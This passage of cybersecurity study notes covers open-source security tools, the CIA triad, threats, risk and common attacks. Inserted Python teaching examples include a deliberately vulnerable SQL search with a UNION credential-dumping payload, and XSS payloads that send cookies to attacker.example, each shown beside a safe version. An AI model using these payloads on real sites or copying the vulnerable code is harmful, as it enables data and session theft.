- Some of the security tools found on Kali can feel sluggish.
- Driver support for external devices can be improved.

5. OpenVAS

OpenVAS (Open Vulnerability Assessment System) is another choice for our Top 10 Best
Free Open Source Cyber Security Tools. It is an ideal cyber security tool for vulnerability
scanning and offers you a solid set of features that can be used for authenticated and
unauthenticated testing. It is part of the Greenbone Community Edition suite, a collection of
free security tools.

Pros of OpenVAS
- Uses a regularly updated list of NVT (Network Vulnerability Test) feeds for vulnerability
tests.
- Useful for small businesses.
- CVE coverage for bugs and testing.
- Large and dedicated community, so finding support is easy.
- The open source license of OpenVAS enables third party customization.

Cons of OpenVAS
- Requires solid effort to get up and running with this vulnerability scanner.
- Doesn't offer you any cloud scanner for AWS, Azure, or GCP.
6. Wireshark

Wireshark is a free packet capture and analysis tool for troubleshooting network connections
and analysing IP packets. It has proven to be one of the most popular open source
cyber security tools since its release. Its ability to capture and analyse data packets in real time
makes it desirable to many organizations.

Pros of Wireshark
- Captures live packets and saves them for later inspection.
- VoIP and VLAN identification.
- Very robust filtering capabilities for sorting through captured data.
- Exports to CSV, XML and plain text.
- Allows you to find problems in networks and solve routing problems.

Cons of Wireshark
- New users will take time to master all the analysis mechanisms.
- Can't send or alter packets.
- Some users may find the user interface confusing initially.
7. OpenIAM

OpenIAM is a solid IAM (Identity and Access Management) platform with on-premise
and cloud deployment support. It is a great tool for businesses that want a free but decent IAM
solution. The community edition of OpenIAM is free, but you can also buy a premium
subscription. Deployment options: cloud, SaaS, web based and Windows desktop.

Pros of OpenIAM
- Features for identity management, web based logins and multi-factor authentication.
- Single Sign On.
- Hosted on a cloud provider as an Identity as a Service (IDaaS) program.
- Integrates with other open source tools via OpenID Connect (OIDC).

Cons of OpenIAM
- The documentation support available for this IAM tool is limited.
- Does not generate extensive analytical reports.
8. OpenEDR
OpenEDR is an open source Endpoint Detection and Response (EDR) program developed by
the US cybersecurity firm Comodo. Companies can use OpenEDR to secure their
infrastructure against malware, ransomware, data breaches and other threats.
Pros of OpenEDR
 Sleek dashboard and offers powerful data visualization tools.
 Comes with compelling telemetry features and analysis capabilities.
 Deploy OpenEDR for any endpoints and control it via a cloud based console.
Cons of OpenEDR
 Need to pay for retaining any logs past three days.
 There’s no SaaS based deployment tool for OpenEDR yet.
9. OWASP ZAP
OWASP ZAP (Zed Attack Proxy) is one of the most widely used web application scanners. It is an
open source security tool that you can customize as necessary. ZAP's notable features
include an intercepting proxy, port scanner, passive scanner, automated testing, etc.
Pros of OWASP ZAP
 Excellent GUI interface that makes testing effortless.
 Actively maintained and rolls out new features and bug fixes regularly.
 API endpoints give you complete control over its operation.
Cons of OWASP ZAP
 Reporting feature doesn’t follow any specific format and may feel cluttered.
 Paid support is not available, so technical expertise is sometimes required.
10. sqlmap
Last on the list of Top 10 Best Free Open Source Cyber Security Tools is sqlmap, a
tool for finding and exploiting SQL injection flaws in web applications and the databases
behind them. It features a powerful detection engine that recognises the common SQL injection
techniques, and it offers switches for routine tasks such as database fingerprinting, data
fetching and, on database setups that permit it, remote command execution.

Pros of sqlmap
 Supports all major databases, including MySQL, MSSQL, PostgreSQL,
Firebird, MariaDB, and Amazon Redshift.
 Connect directly to the database through IP, port and user credentials.
 sqlmap supports enumeration over users, hashes, tables, columns, and privileges.
 It can recognize hash formats automatically and crack them via dictionary attacks.
Cons of sqlmap
 Lacks any GUI interface and requires command line proficiency.
 May need to confirm some vulnerabilities manually.

5. Explain CIA in cyber security?

 Answer- The CIA Triad is a widely used information security model. It
guides an organization's efforts towards ensuring data security. Its three principles,
confidentiality, integrity and availability (which is also the full form of CIA in
cybersecurity), form the cornerstone of a security infrastructure, and it is good practice to
apply them to any security program.
 Confidentiality makes sure that only authorized people can read or access data; it is
about preventing unauthorized disclosure.
 Integrity helps maintain the trustworthiness of data by keeping it in the correct state
and protected against improper modification.
 Availability means that authorized users are able to access data and systems whenever
required.

The CIA Triad is so elementary to information security that whenever a data breach or any
other security incident occurs, one or more of these principles has been compromised. So the
CIA Triad is always at the top of the priority list for any infosec professional.

Security experts assess threats and vulnerabilities thinking about the impact that they might
have on the CIA of an organization’s assets. Based on that assessment, the security team
enforces a specific set of security controls to minimize the risks within that environment.

CIA Triad Examples

To have a better understanding of how the CIA Triad works in practice, consider an ATM
that allows users to access bank balances and other information. An ATM incorporates
measures to cover the principles of the triad:

 The two-factor authentication (debit card with the PIN code)
provides confidentiality before authorizing access to sensitive data.
 The ATM and bank software ensure data integrity by recording every transfer and
withdrawal made via the ATM accurately in the user's bank account.
 The ATM provides availability as it is for public use and is accessible at all times.

Brief History of the CIA Triad

The CIA Triad took shape over time as wisdom passed among information security
professionals rather than coming from a single proponent. The formalization of confidentiality can be
traced back to a 1976 U.S. Air Force study. Integrity, on the other hand, was formalized in a
1987 paper arguing that commercial computing requires a special focus on data
correctness. The origin of availability is less clear, but the idea rose to
prominence in 1988 after the Morris worm, which had devastating effects on
thousands of major UNIX machines; the internet had to be partitioned for days to
clean up the damage.

It is, however, not clear when the CIA became a triad. The foundational concept seems to
have been established by 1998.

Importance of the CIA Triad

Now that we have covered what the CIA is, it is time to understand why it is more effective
as a triad. The CIA Triad, in a way, helps make sense of the diverse security techniques,
software, and services available. Rather than a shot in the dark, it helps to clearly draw a
picture of what is exactly required that will address the security concerns.

The three concepts exist in tension with one another. For
example, requiring elaborate authentication helps ensure confidentiality, but at the
same time some people who have a right to the data may not get access, thereby reducing
availability.

As one is forming information security policies, the CIA Triad will help make more effective
decisions on which of the three principles is most useful for the specific set of data and for
the organization overall.

6. What are threats? Explain different types of threats. What is risk? State the difference
between risk and threats.

Answer-

THREATS-
In cybersecurity, the most common understanding of a threat is anything that could exploit a
vulnerability, which could affect the confidentiality, integrity or availability of your systems,
data, people and more. (Confidentiality, integrity and availability, sometimes known as the
CIA triad, is another fundamental concept of cybersecurity.)
A more advanced definition of threat is when an adversary or attacker has the opportunity,
capability and intent to bring a negative impact upon your operations, assets, workforce
and/or customers. Examples of this can include malware, ransomware, phishing attacks and
more — and the types of threats out there will continue to evolve.
Importantly, not all threats are the same, according to Bob Rudis, Vice President Data
Science at GreyNoise Intelligence. And that’s where threat intelligence comes in. Rudis says:
“An attacker may have the intent and capability to do harm, but no opportunity.”
For example, your organization may have no vulnerabilities to exploit thanks to a solid patch
management program or strong network segmentation policies that prevent access to critical
systems. Chances are, however, that you do have vulnerabilities, so let's consider the
risk factor.

Common Sources of Cyber Threats

Here are several common sources of cyber threats against organizations:

 Nation states—hostile countries can launch cyber attacks against local companies and
institutions, aiming to interfere with communications, cause disorder, and inflict damage.
 Terrorist organizations—terrorists conduct cyber attacks aimed at destroying or abusing
critical infrastructure, threaten national security, disrupt economies, and cause bodily harm to
citizens.
 Criminal groups—organized groups of hackers aim to break into computing systems for
economic benefit. These groups use phishing, spam, spyware and malware for extortion, theft
of private information, and online scams.
 Hackers—individual hackers target organizations using a variety of attack techniques. They
are usually motivated by personal gain, revenge, financial gain, or political activity. Hackers
often develop new threats, to advance their criminal ability and improve their personal
standing in the hacker community.
 Malicious insiders—an employee who has legitimate access to company assets, and abuses
their privileges to steal information or damage computing systems for economic or personal
gain. Insiders may be employees, contractors, suppliers, or partners of the target organization.
They can also be outsiders who have compromised a privileged account and are
impersonating its owner.

Types of Cybersecurity Threats

Malware Attacks

Malware is an abbreviation of "malicious software", which includes viruses, worms, trojans,
spyware, and ransomware, and is the most common type of cyberattack. Malware infiltrates a
system, usually via a link on an untrusted website or email or an unwanted software
download. It deploys on the target system, collects sensitive data, manipulates and blocks
access to network components, and may destroy data or shut down the system altogether.

Here are some of the main types of malware attacks:

 Viruses—a piece of code injects itself into an application. When the application runs, the
malicious code executes.
 Worms—malware that exploits software vulnerabilities and backdoors to gain access to an
operating system. Once installed in the network, the worm can carry out attacks such as
distributed denial of service (DDoS).
 Trojans—malicious code or software that poses as an innocent program, hiding in apps,
games or email attachments. An unsuspecting user downloads the trojan, allowing it to gain
control of their device.
 Ransomware—a user or organization is denied access to their own systems or data via
encryption. The attacker typically demands a ransom be paid in exchange for a decryption
key to restore access, but there is no guarantee that paying the ransom will actually restore
full access or functionality.
 Cryptojacking—attackers deploy software on a victim’s device, and begin using their
computing resources to generate cryptocurrency, without their knowledge. Affected systems
can become slow and cryptojacking kits can affect system stability.
 Spyware—a malicious actor gains access to an unsuspecting user’s data, including sensitive
information such as passwords and payment details. Spyware can affect desktop browsers,
mobile phones and desktop applications.
 Adware—a user’s browsing activity is tracked to determine behavior patterns and interests,
allowing advertisers to send the user targeted advertising. Adware is related to spyware but
does not involve installing software on the user’s device and is not necessarily used for
malicious purposes, but it can be used without the user’s consent and compromise their
privacy.
 Fileless malware—no new executable is written to disk. Native tools such as WMI and
PowerShell are abused to carry out the malicious functions. This stealthy form of attack is
difficult to detect (file-scanning antivirus has nothing to flag), because the tools being run
are legitimate, signed system components.
 Rootkits—software is injected into applications, firmware, operating system kernels or
hypervisors, providing remote administrative access to a computer. The attacker can start the
operating system within a compromised environment, gain complete control of the computer
and deliver additional malware.

Social Engineering Attacks

Social engineering involves tricking users into providing an entry point for malware. The
victim provides sensitive information or unwittingly installs malware on their device, because
the attacker poses as a legitimate actor.

Here are some of the main types of social engineering attacks:

 Baiting—the attacker lures a user into a social engineering trap, usually with a promise of
something attractive like a free gift card. The victim provides sensitive information such as
credentials to the attacker.
 Pretexting—similar to baiting, the attacker pressures the target into giving up information
under false pretenses. This typically involves impersonating someone with authority, for
example an IRS or police officer, whose position will compel the victim to comply.
 Phishing—the attacker sends emails pretending to come from a trusted source. Phishing often
involves sending fraudulent emails to as many users as possible, but can also be more
targeted. For example, "spear phishing" personalizes the email to target a specific user, while
"whaling" takes this a step further by targeting high-value individuals such as CEOs.
 Vishing (voice phishing)—the imposter uses the phone to trick the target into disclosing
sensitive data or granting access to the target system. Vishing is often aimed at older individuals
but can be employed against anyone.
 Smishing (SMS phishing)—the attacker uses text messages as the means of deceiving the
victim.
 Piggybacking—an authorized user provides physical access to another individual who
"piggybacks" off the user's credentials. For example, an employee may grant access to
someone posing as a new employee who misplaced their credential card.
 Tailgating—an unauthorized individual follows an authorized user into a location, for
example by quickly slipping in through a protected door after the authorized user has opened
it. This technique is similar to piggybacking except that the person being tailgated is unaware
that they are being used by another individual.

Supply Chain Attacks

Supply chain attacks are an increasingly prominent threat to software developers and vendors. Their
purpose is to infect legitimate applications and distribute malware via source code, build processes or
software update mechanisms.

Attackers look for insecure network protocols, server infrastructure and coding
practices, and use them to compromise build and update processes, modify source code and
hide malicious content.

Supply chain attacks are especially severe because the applications being compromised
by attackers are signed and certified by trusted vendors. In a software supply chain attack, the
software vendor is not aware that its applications or updates are infected with malware.
Malicious code runs with the same trust and privileges as the compromised application.

Types of supply chain attacks include:

 Compromise of build tools or development pipelines
 Compromise of code signing procedures or developer accounts
 Malicious code sent as automated updates to hardware or firmware components
 Malicious code pre-installed on physical devices

Man-in-the-Middle Attack

A Man-in-the-Middle (MitM) attack involves intercepting the communication between two
endpoints, such as a user and an application. The attacker can eavesdrop on the
communication, steal sensitive data, and impersonate each party participating in the
communication.

Examples of MitM attacks include:

 Wi-Fi eavesdropping—an attacker sets up a Wi-Fi connection, posing as a legitimate actor,
such as a business, that users may connect to. The fraudulent Wi-Fi allows the attacker to
monitor the activity of connected users and intercept data such as payment card details and
login credentials.
 Email hijacking—an attacker spoofs the email address of a legitimate organization, such as a
bank, and uses it to trick users into giving up sensitive information or transferring money to
the attacker. The user follows instructions they think come from the bank but are actually
from the attacker.
 DNS spoofing—Domain Name System (DNS) responses are forged, or a resolver's cache is
poisoned, directing a user to a malicious website posing as a legitimate site. The attacker may
divert traffic from the legitimate site or steal the user's credentials.
 IP spoofing—an attacker forges the source IP address of packets so that they appear to come
from a trusted host, for example to pose as a legitimate server or to slip past address-based
access controls.
 HTTPS spoofing—HTTPS is generally considered the more secure version of HTTP, but the
padlock only shows that the connection is encrypted to whoever controls that domain, not that
the site is trustworthy. An attacker serves a malicious site over HTTPS, often from a lookalike
domain, so that the "HTTPS" in the URL lulls the user into assuming the site is safe.

Denial-of-Service Attack

A Denial-of-Service (DoS) attack overloads the target system with a large volume of traffic,
hindering the ability of the system to function normally. An attack involving multiple devices
is known as a distributed denial-of-service (DDoS) attack.

DoS attack techniques include:

 HTTP flood DDoS—the attacker uses HTTP requests that appear legitimate to overwhelm an
application or web server. This technique does not require high bandwidth or malformed
packets, and typically tries to force a target system to allocate as many resources as possible
for each request.
 SYN flood DDoS—initiating a Transmission Control Protocol (TCP) connection sequence
involves sending a SYN request that the host must respond to with a SYN-ACK that
acknowledges the request, and then the requester must respond with an ACK. Attackers can
exploit this sequence, tying up server resources, by sending SYN requests but not responding
to the SYN-ACKs from the host.
 UDP flood DDoS—a remote host is flooded with User Datagram Protocol (UDP) packets
sent to random ports. For each packet the host must check whether an application is listening
on that port and, finding none, reply with an ICMP "Destination Unreachable" packet, which
uses up the host's resources.

 ICMP flood—a barrage of ICMP Echo Request packets overwhelms the target, consuming
both inbound and outgoing bandwidth. The servers may try to respond to each request with
an ICMP Echo Reply packet, but cannot keep up with the rate of requests, so the system
slows down.
 NTP amplification—Network Time Protocol (NTP) servers are accessible to the public and
can be exploited by an attacker to send large volumes of UDP traffic to a targeted server. This
is considered an amplification attack due to the query-to-response ratio of 1:20 to 1:200,
which allows an attacker to exploit open NTP servers to execute high-volume, high-
bandwidth DDoS attacks.
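The SYN flood described above can be turned into detection logic over connection records. This is an added example, not code from the original notes; it assumes records of the form (timestamp in seconds, source IP, destination port, TCP flag) such as a firewall or conntrack export would give, where "S" is the client's SYN, "A" the client's final ACK of the handshake and "R" a reset. The sample records are constructed.

```python
"""SYN-flood detection over connection-tracking records.

Added example, not part of the original notes. Assumes records shaped like
(timestamp_seconds, source_ip, destination_port, tcp_flag); the sample
records below are constructed.
"""
from collections import defaultdict

SYN, ACK, RST = "S", "A", "R"


def half_open_by_source(records, window):
    """Per source IP, handshakes begun (SYN) but never resolved (ACK or RST)
    inside [start, end). A flooder racks these up; real clients net to zero."""
    start, end = window
    opened = defaultdict(int)
    resolved = defaultdict(int)
    for ts, src, _dport, flag in records:
        if not start <= ts < end:
            continue
        if flag == SYN:
            opened[src] += 1
        elif flag in (ACK, RST):
            resolved[src] += 1
    counts = {src: n - resolved[src] for src, n in opened.items()}
    return {src: n for src, n in counts.items() if n > 0}


def flag_syn_flood(records, window, threshold):
    """Sources whose half-open count in the window reaches the threshold."""
    return sorted(src for src, n in half_open_by_source(records, window).items()
                  if n >= threshold)


def constructed_sample():
    recs = []
    for i in range(20):  # attacker: 20 SYNs in 0.2 s, never completes a handshake
        recs.append((1.0 + i * 0.01, "203.0.113.7", 443, SYN))
    for i in range(3):  # legitimate client: three complete handshakes
        recs.append((1.5 + i, "198.51.100.4", 443, SYN))
        recs.append((1.6 + i, "198.51.100.4", 443, ACK))
    recs.append((2.0, "192.0.2.9", 8080, SYN))  # closed port: SYN answered by RST
    recs.append((2.1, "192.0.2.9", 8080, RST))
    return recs


SAMPLE_RECORDS = constructed_sample()

if __name__ == "__main__":
    print(half_open_by_source(SAMPLE_RECORDS, (0.0, 10.0)))
    print(flag_syn_flood(SAMPLE_RECORDS, (0.0, 10.0), threshold=10))
```

A flooder stands out as a source whose SYNs never resolve, while a client that completes its handshakes nets to zero; the time window matters because every legitimate client is briefly half-open. On the server side the standard mitigation is SYN cookies, which let the kernel defer allocating connection state until the third packet of the handshake arrives.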

Injection Attacks

Injection attacks exploit a variety of vulnerabilities to supply malicious input that the
application, or an interpreter behind it, treats as code or commands rather than as data.
Successful attacks may expose sensitive information, cause a DoS or compromise the entire system.

Here are some of the main vectors for injection attacks:

 SQL injection—an attacker enters SQL syntax into an end user input channel, such as a
web form or comment field. A vulnerable application concatenates that data into its query
string and sends it to the database, which executes whatever SQL has been injected. Most
web applications use databases based on Structured Query Language (SQL), so any of them that
builds queries by string concatenation rather than with parameterized queries is exposed. A
related variant is NoSQL injection, targeted against databases that do not use a relational data
structure.
 Code injection—an attacker can inject code into an application if it is vulnerable. The web
server executes the malicious code as if it were part of the application.
 OS command injection—an attacker can exploit a command injection vulnerability to input
commands for the operating system to execute. This allows the attack to exfiltrate OS data or
take over the system.
 LDAP injection—an attacker inputs characters to alter Lightweight Directory Access
Protocol (LDAP) queries. A system is vulnerable if it uses unsanitized LDAP queries. These
attacks are very severe because LDAP servers may store user accounts and credentials for an
entire organization.
 XML eXternal Entities (XXE) Injection—an attack carried out using specially constructed
XML documents. It differs from the other vectors in that it abuses a feature of the XML parser
(resolution of external entities, enabled by default in many older parsers) rather than a
missing input check in the application's own code. A malicious document can be used to read
local files, perform server-side request forgery (SSRF) and, with some parsers, achieve remote
code execution.
 Cross-Site Scripting (XSS)—an attacker inputs a string of text containing malicious
JavaScript. The target's browser executes the code, enabling the attacker to redirect users to a
malicious website or steal session cookies to hijack a user's session. An application is
vulnerable to XSS if it places untrusted input into a page without encoding it for the HTML
context in which it appears.

What is a risk?

Risk is the probability of a negative (harmful) event occurring together with the potential scale
of that harm. Your organizational risk fluctuates over time, sometimes even on a daily basis,
due to both internal and external factors.

From a slightly more technical angle, the Open FAIR body of knowledge defines cyber risk as the
probable frequency and probable magnitude of loss. It sounds complicated until we break it
down: "For starters," Rudis says, "there is no ethereal risk. Something is at risk, be it a
system, device, business process, bank account, your firm's reputation or human life."
This is where cybersecurity teams can begin to measure that risk:

1. Estimate how often an adversary or attacker is likely to attempt to exploit a
vulnerability to cause the desired harm.
2. Gauge how well your existing systems, controls and processes can stand up to those
attempts.
3. Determine the value of the impact or harm the adversary may cause if the adversary is
indeed successful.

One way of describing risk was consequence × likelihood, but as security teams have
advanced their processes and intelligence, we see that you also have to account for the
safeguards you've already put in place.

This is another way of looking at risk, albeit a bit simplified:

Risk = Threat × Vulnerability

We can sum up this calculation with the concepts from above: a vulnerability
multiplied by the potential threat (frequency, existing safeguards and potential value loss)
gives you an estimate of the risk involved. For organizations to begin risk
mitigation and risk management, you first need to understand your vulnerabilities and the
threats to those vulnerabilities. This is no small task.
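The three estimation steps above can be carried through as a calculation. The following is an added example, not the notes' own method and not the Open FAIR standard's formulas: it uses a simplified attempts-per-year × (1 − control strength) × loss-per-event model, and every scenario figure in it is constructed for illustration.

```python
"""Turning the three estimation steps into a number.

Added example, not the notes' own method. Simplified model: attempts per
year, the fraction of attempts the existing controls stop, and the loss
when an attempt succeeds. The scenario figures are constructed.
"""


def loss_event_frequency(attempts_per_year, control_strength):
    """Steps 1 and 2: how often attempts occur, times how often they get past
    the safeguards already in place (control_strength = fraction stopped)."""
    if not 0.0 <= control_strength <= 1.0:
        raise ValueError("control_strength must be between 0 and 1")
    return attempts_per_year * (1.0 - control_strength)


def annual_loss_exposure(attempts_per_year, control_strength, loss_per_event):
    """Step 3 folded in: expected loss per year for one scenario."""
    return loss_event_frequency(attempts_per_year, control_strength) * loss_per_event


def rank_scenarios(scenarios):
    """scenarios: {name: (attempts_per_year, control_strength, loss_per_event)}.
    Returns [(name, exposure)] with the highest exposure first, which is the
    order in which a team should spend its mitigation effort."""
    ranked = [(name, annual_loss_exposure(*params)) for name, params in scenarios.items()]
    return sorted(ranked, key=lambda item: item[1], reverse=True)


def control_value(attempts_per_year, strength_before, strength_after, loss_per_event):
    """Exposure removed by a new or improved safeguard; compare it with the cost."""
    before = annual_loss_exposure(attempts_per_year, strength_before, loss_per_event)
    after = annual_loss_exposure(attempts_per_year, strength_after, loss_per_event)
    return before - after


# Constructed figures: (attempts per year, fraction stopped today, loss per success)
CONSTRUCTED_SCENARIOS = {
    "phishing leading to credential theft": (200, 0.95, 40_000),
    "internet-facing service exploited before patching": (12, 0.50, 250_000),
    "unencrypted laptop lost or stolen": (2, 0.00, 100_000),
}

if __name__ == "__main__":
    for name, exposure in rank_scenarios(CONSTRUCTED_SCENARIOS):
        print(f"{exposure:>12,.0f}  {name}")
    # full-disk encryption takes the laptop scenario from total loss to near zero
    print(control_value(2, 0.00, 0.99, 100_000))
```

Mapping this back to Risk = Threat × Vulnerability: attempt frequency and loss magnitude are the threat side, and (1 − control strength) is the vulnerability side, which is exactly the "existing safeguards" term the text says a bare consequence × likelihood product leaves out. The ranking also shows why the loudest threat is not always the top risk: phishing attempts are the most frequent, but the half-stopped exploit of an exposed service carries the larger expected loss.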

7. What are social engineering attacks? Explain different methods of attacks. Explain
different prevention methods of social engineering attacks.

Answer- What is social engineering

Social engineering is the term used for a broad range of malicious activities accomplished
through human interactions. It uses psychological manipulation to trick users into making
security mistakes or giving away sensitive information.

Social engineering attacks happen in one or more steps. A perpetrator first investigates the
intended victim to gather necessary background information, such as potential points of entry
and weak security protocols, needed to proceed with the attack. Then, the attacker moves to
gain the victim’s trust and provide stimuli for subsequent actions that break security
practices, such as revealing sensitive information or granting access to critical resources.

7 Common Types of Cyberattacks

If you've ever studied famous battles in history, you'll know that no two are exactly
alike. Still, there are similar strategies and tactics often used in battle because they are
time-proven to be effective.

Similarly, when a criminal is trying to hack an organization, they won't re-invent the
wheel unless they absolutely have to: They'll draw upon common types of hacking
techniques that are known to be highly effective, such as malware, phishing, or cross-site
scripting (XSS).

Whether you're trying to make sense of the latest data breach headline in the news or
analyzing an incident in your own organization, it helps to understand the different
attack vectors a malicious actor might try to cause harm. Here’s an overview of some of
the most common types of cybersecurity attacks seen today.

Malware

If you've ever seen an antivirus alert pop up on your screen, or if you've mistakenly
clicked a malicious email attachment, then you've had a close call with malware.
Attackers love to use malware to gain a foothold in users' computers—and,
consequently, the offices they work in—because it can be so effective.

"Malware" refers to various forms of harmful software, such as viruses and ransomware.
Once malware is in your computer, it can wreak all sorts of havoc, from taking control of
your machine, to monitoring your actions and keystrokes, to silently sending all sorts of
confidential data from your computer or network to the attacker's home base.

Attackers will use a variety of methods to get malware into your computer, but at some
stage it often requires the user to take an action to install the malware. This can include
clicking a link to download a file, or opening an attachment that may look harmless (like
a Word document or PDF attachment), but actually has a malware installer hidden
within.


Phishing

Of course, chances are you wouldn't just open a random attachment or click on a link in
any email that comes your way—there has to be a compelling reason for you to take
action. Attackers know this, too. When an attacker wants you to install malware or
divulge sensitive information, they often turn to phishing tactics, or pretending to be
someone or something else to get you to take an action you normally wouldn’t. Since
they rely on human curiosity and impulses, phishing attacks can be difficult to stop.

In a phishing attack, an attacker may send you an email that appears to be from someone
you trust, like your boss or a company you do business with. The email will seem
legitimate, and it will have some urgency to it (e.g. fraudulent activity has been detected
on your account). In the email, there will be an attachment to open or a link to click.

Opening the malicious attachment installs malware on your
computer. If you click the link, it may send you to a legitimate-looking website that asks
you to log in to access an important file, except the website is actually a trap used to
capture your credentials when you try to log in.

To combat phishing attempts, it is essential to understand the importance of verifying email
senders and attachments/links.


SQL Injection Attack

SQL (pronounced "sequel") stands for structured query language; it's a language
used to query and manage databases. Many of the servers that store critical
data for websites and services use SQL to manage the data in their databases.

A SQL injection attack specifically targets this kind of server, using malicious code to
get the server to divulge information it normally wouldn’t. This is especially problematic
if the server stores private customer information from the website, such as credit card
numbers, usernames and passwords (credentials), or other personally identifiable
information, which are tempting and lucrative targets for an attacker.

A SQL injection attack works by exploiting an application that builds SQL statements from
user input without separating the data from the query code, so the database ends up running
the attacker's SQL. For example, if a site's search feature is vulnerable to injection, an
attacker can go to the website's search box and type in a fragment of SQL that forces the
database to dump all of its stored usernames and passwords (or password hashes) for the site.
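The search-box scenario just described, and the SQL injection entry under Injection Attacks earlier, look like this in code. This is an added example, not from the original notes and not sqlmap's code: an in-memory SQLite database with a constructed schema, the vulnerable search beside its parameterised version, and the UNION-based payload that pulls the users table out through the product search.

```python
"""SQL injection: the vulnerable query beside the parameterised one.

Added example, not from the original notes or from sqlmap. Uses an
in-memory SQLite database with a constructed schema so it runs offline.
"""
import sqlite3


def setup_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE products(id INTEGER PRIMARY KEY, name TEXT NOT NULL);
        CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT NOT NULL,
                           password_hash TEXT NOT NULL);
        INSERT INTO products(name) VALUES ('widget'), ('gadget');
        INSERT INTO users(username, password_hash)
            VALUES ('alice', 'hash_a'), ('bob', 'hash_b');
        """
    )
    return conn


def search_vulnerable(conn, term):
    """Deliberately vulnerable: the search term is spliced into the SQL text,
    so a quote character in it changes the meaning of the statement."""
    sql = "SELECT name FROM products WHERE name LIKE '%" + term + "%'"
    return [row[0] for row in conn.execute(sql)]


def search_safe(conn, term):
    """Parameterised: the statement is fixed and the term travels as a value.
    Whatever it contains, it can only ever be compared against name."""
    sql = "SELECT name FROM products WHERE name LIKE ?"
    return [row[0] for row in conn.execute(sql, ("%" + term + "%",))]


# Closes the LIKE string, appends a second SELECT over users, and comments
# out the rest of the original statement.
UNION_PAYLOAD = "' UNION SELECT username || ':' || password_hash FROM users -- "

if __name__ == "__main__":
    db = setup_db()
    print(search_vulnerable(db, "wid"))           # ['widget']
    print(search_vulnerable(db, UNION_PAYLOAD))   # products plus every user's credentials
    print(search_safe(db, UNION_PAYLOAD))         # []
```

With the payload, the vulnerable function actually sends `SELECT name FROM products WHERE name LIKE '%' UNION SELECT username || ':' || password_hash FROM users -- %'` to the database. sqlmap automates the detection step by sending payloads of this kind and watching how the responses change; the fix is the same whichever database engine sits behind the application: never build the statement from the input, pass the input as a parameter.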


Cross-Site Scripting (XSS)

In an SQL injection attack, an attacker goes after a vulnerable website to target its stored
data, such as user credentials or sensitive financial data. But if the attacker would rather
directly target a website's users, they may opt for a cross-site scripting attack.

Similar to an SQL injection attack, this attack also involves injecting malicious code into
a website, but in this case the website itself is not being attacked. Instead, the malicious
code the attacker has injected only runs in the user's browser when they visit the attacked
website, and it goes after the visitor directly, not the website.

One of the most common ways an attacker can deploy a cross-site scripting attack is by
injecting malicious code into a comment or a script that could automatically run. For
example, they could embed a link to a malicious JavaScript in a comment on a blog.

Cross-site scripting attacks can significantly damage a website's reputation by placing
the users' information at risk without any indication that anything malicious even
occurred. Any sensitive information a user sends to the site—such as their credentials,
credit card information, or other private data—can be hijacked via cross-site scripting
without the website owners realizing there was even a problem in the first place.
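The blog-comment scenario above, as an added example that is not part of the original notes: a comment renderer that drops untrusted text straight into HTML beside one that encodes it, plus an attribute-context variant to show that the encoding has to match where the value lands. The rendering functions and payloads are constructed; the only library call is html.escape from the standard library.

```python
"""Stored XSS in a comment field, and the output encoding that neutralises it.

Added example, not from the original notes. Rendering functions and payloads
are constructed; html.escape is the standard-library encoder.
"""
import html

# Constructed payloads: the first fires in HTML text context, the second
# breaks out of a quoted attribute when the value is not encoded.
SCRIPT_PAYLOAD = '<script src="https://attacker.example/steal.js"></script>'
ATTRIBUTE_PAYLOAD = '" onmouseover="fetch(\'https://attacker.example/?c=\'+document.cookie)'


def render_comment_vulnerable(author, body):
    """Deliberately vulnerable: untrusted strings dropped straight into HTML."""
    return f'<div class="comment"><b>{author}</b>: {body}</div>'


def render_comment_safe(author, body):
    """Encode for the HTML text context: < > & (and quotes) become entities
    the browser displays but never parses as markup."""
    return (f'<div class="comment"><b>{html.escape(author)}</b>: '
            f'{html.escape(body)}</div>')


def render_profile_link_vulnerable(display_name):
    # Attribute context: a stray double quote ends the attribute value and
    # whatever follows becomes new attributes, here an event handler.
    return f'<a href="/profile" title="{display_name}">profile</a>'


def render_profile_link_safe(display_name):
    # quote=True (the default) also encodes " and ', which is what an
    # attribute context needs on top of the text-context characters.
    return f'<a href="/profile" title="{html.escape(display_name, quote=True)}">profile</a>'


def has_live_script(rendered):
    """Crude check, only to show the two renderings differ: is there still a
    real <script> tag or a real quoted onmouseover attribute in the page?"""
    lower = rendered.lower()
    return "<script" in lower or ' onmouseover="' in lower


if __name__ == "__main__":
    print(render_comment_vulnerable("mallory", SCRIPT_PAYLOAD))
    print(render_comment_safe("mallory", SCRIPT_PAYLOAD))
    print(render_profile_link_vulnerable(ATTRIBUTE_PAYLOAD))
    print(render_profile_link_safe(ATTRIBUTE_PAYLOAD))
```

Two caveats a practitioner would add. Encoding is context-specific: html.escape is right for HTML text and quoted attributes, but it does nothing for a value placed inside a `href` (where `javascript:` URLs need a URL allow-list) or inside a script block. And because the payload above reads document.cookie, marking the session cookie HttpOnly removes the most valuable thing a successful XSS can steal, even though it does not fix the XSS itself.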


Denial-of-Service (DoS)

Imagine you're sitting in traffic on a one-lane country road, with cars backed up as far as
the eye can see. Normally this road never sees more than a car or two, but a county fair
and a major sporting event have ended around the same time, and this road is the only
way for visitors to leave town. The road can't handle the massive amount of traffic, and
as a result it gets so backed up that pretty much no one can leave.

That's essentially what happens to a website during a denial-of-service (DoS) attack. If
you flood a website with more traffic than it was built to handle, you'll overload the
website's server and it'll be nigh-impossible for the website to serve up its content to
visitors who are trying to access it.

This can happen for innocuous reasons of course, say if a massive news story breaks and
a newspaper's website gets overloaded with traffic from people trying to find out more.
But often, this kind of traffic overload is malicious, as an attacker floods a website with
an overwhelming amount of traffic to essentially shut it down for all users.

In some instances, these DoS attacks are performed by many computers at the same time.
This scenario of attack is known as a Distributed Denial-of-Service Attack (DDoS). This
type of attack can be even more difficult to overcome due to the attacker appearing from
many different IP addresses around the world simultaneously, making determining the
source of the attack even more difficult for network administrators.


Session Hijacking and Man-in-the-Middle Attacks

When you're on the internet, your computer has a lot of small back-and-forth
transactions with servers around the world letting them know who you are and
requesting specific websites or services. In return, if everything goes as it should, the
web servers should respond to your request by giving you the information you're
accessing. This process, or session, happens whether you are simply browsing or when
you are logging into a website with your username and password.

The session between your computer and the remote web server is given a unique session
ID, which should stay private between the two parties; however, an attacker can hijack
the session by capturing the session ID and posing as the computer making a request,
allowing them to log in as an unsuspecting user and gain access to unauthorized
information on the web server. There are a number of methods an attacker can use to
steal the session ID, such as a cross-site scripting attack used to hijack session IDs.

